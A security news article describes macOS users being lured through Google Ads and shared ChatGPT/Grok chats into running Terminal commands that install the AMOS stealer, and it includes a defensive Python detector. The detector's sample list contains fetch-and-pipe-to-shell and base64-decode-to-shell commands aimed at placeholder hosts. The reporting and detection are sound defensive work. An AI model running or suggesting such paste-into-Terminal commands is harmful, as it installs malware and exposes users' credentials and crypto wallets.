GBHackers

Hackers Exploit ChatGPT, Grok and Google Ads to Spread macOS AMOS Stealer


Threat actors are abusing shareable ChatGPT and Grok conversations and pushing them with Google Search ads to trick macOS users into running Terminal commands that install the Atomic macOS Stealer (AMOS).

This campaign shows how attackers now blend social engineering with trusted platforms to make malware delivery look “normal.”

macOS infostealers have become a fast-growing underground business focused on stealing browser data, Keychain secrets, and especially cryptocurrency wallet access.

Flare reports that macOS stealer operators are targeting at least 103 Chrome cryptocurrency extensions, and they pair that theft with wallet-themed phishing for brands like Ledger, Trezor, and Exodus.

In the same reporting, a forum actor advertised a revenue-share model (50/50 for crypto theft) while offering partners full access to non-crypto stolen logs, highlighting how “affiliate” style distribution is now common.

How the Google Ads-to-AI trap works

In incidents analyzed by Malwarebytes, the infection chain began with a normal search query (for example, “clear disk space on macOS”) that led users to poisoned AI chat pages surfaced in search results and through advertising.

Those shared conversations presented step-by-step “fix” instructions that directed the victim to run a macOS Terminal command, which then resulted in AMOS infection.

Malwarebytes notes the command flow can include base64-decoding and downloading a malicious script (a “curl … | bash” style pattern), letting the attacker execute code without a typical app install review step.

The key twist is credibility: the malicious instructions are hosted on legitimate AI domains via public sharing links, and the traffic is boosted with sponsored placements that resemble real support results.

Flare similarly describes this as a ClickFix-style approach: post malicious instructions inside ChatGPT/Grok chats, then pay for visibility through Google Ads so victims encounter the “guide” first.

The AMOS distribution trend is landing at the same time as another macOS shift: malware increasingly arrives inside installers that look legitimate to Apple’s built-in checks.

Jamf reported MacSync samples delivered as signed and notarized Swift applications, with the Mach-O signed under Developer Team ID GNJLS3UYZ4, allowing the app to pass Gatekeeper at the time of analysis.

Flare’s write-up adds that these samples used large DMGs and decoy content, plus environment checks, to make analysis and detection harder.

What to watch for (defender checklist)

  • Users or helpdesk staff copying “fix” commands from a web page into Terminal, especially commands that download and immediately execute scripts.
  • Apps (even “signed” ones) unexpectedly prompting for passwords or access that doesn’t match the task the user is trying to do.
  • Unusual outbound connections from non-financial apps to blockchain infrastructure, which Flare flags as a practical hunting signal for some infostealer activity.
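The command flow described earlier (the “curl … | bash” and base64-decode patterns) and the first checklist item lend themselves to a mechanical check over recorded command lines. The following is an added example, not code from the article, Malwarebytes or Flare: it tokenizes macOS shell command lines as an endpoint agent or shell-history collector might record them and flags any that fetch or base64-decode content and hand it straight to a shell. The sample command lines and the example.invalid URLs are constructed.

```python
import os
import shlex
DOWNLOADERS, SHELLS = {"curl", "wget"}, {"sh", "bash", "zsh"}
SEPARATORS = {"|", "||", "&&", ";"}
REASONS = {"download": "remote content fetched with curl/wget and handed to a shell",
           "decode": "base64-decoded content handed to a shell"}

# Constructed sample command lines, in the shape an endpoint agent or shell-history
# collector would record them; example.invalid is a reserved, non-resolving domain.
SAMPLE_COMMANDS = [
    "curl -fsSL https://example.invalid/fix-disk-space.sh | bash",
    "echo 'ZWNobyBoaQ==' | base64 -d | sh",
    "curl -s https://example.invalid/p.txt | base64 --decode | bash",
    "curl -O https://example.invalid/report.txt && sudo bash ./report.txt",
    "brew update && brew cleanup --prune=all",
    "cat ~/notes.txt | base64",
]

def split_segments(cmd):
    """Tokenize a command line and split it at |, ||, && and ; (Python 3.8+ shlex)."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # keep URLs, paths and flags as single tokens
    segments = [[]]
    for tok in lexer:
        if tok in SEPARATORS:
            segments.append([])
        else:
            segments[-1].append(tok)
    return [seg for seg in segments if seg]

def classify_segment(tokens):
    """Label a segment download, decode, execute or other; a leading sudo is ignored."""
    if tokens[0] == "sudo" and len(tokens) > 1:
        tokens = tokens[1:]
    prog = os.path.basename(tokens[0])
    if prog in DOWNLOADERS:
        return "download"
    if prog == "base64" and any(t in ("-d", "-D", "--decode") for t in tokens[1:]):
        return "decode"
    return "execute" if prog in SHELLS else "other"

def detect_clickfix_pattern(cmd):
    """Return the reasons (possibly none) a command line feeds fetched/decoded data to a shell."""
    labels = [classify_segment(seg) for seg in split_segments(cmd)]
    first_shell = labels.index("execute") if "execute" in labels else 0
    feeders = set(labels[:first_shell])  # segments that ran before the first shell
    return [REASONS[k] for k in ("download", "decode") if k in feeders]

def scan(commands):
    """Map each flagged command line to its reasons; clean lines are left out."""
    return {cmd: r for cmd in commands if (r := detect_clickfix_pattern(cmd))}
```

A plain `bash script.sh` or a `curl -O` with no following shell is deliberately not flagged; the signal is the chain from fetch or decode into execution, which is what the article describes.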

For broader context, Google’s Threat Intelligence Group has also tracked financially motivated actors (UNC5142) compromising WordPress sites at scale and using “EtherHiding” (data stored in smart contracts on BNB Smart Chain) to support resilient malware distribution; as of June 2025 they identified roughly 14,000 infected pages with injected JavaScript consistent with this activity.

Taken together, these cases show a clear direction: modern macOS attacks don’t rely on obvious warnings going unnoticed; they rely on trusted surfaces (ads, AI chats, notarization, and popular web platforms) to remove the last moments where a user might hesitate.
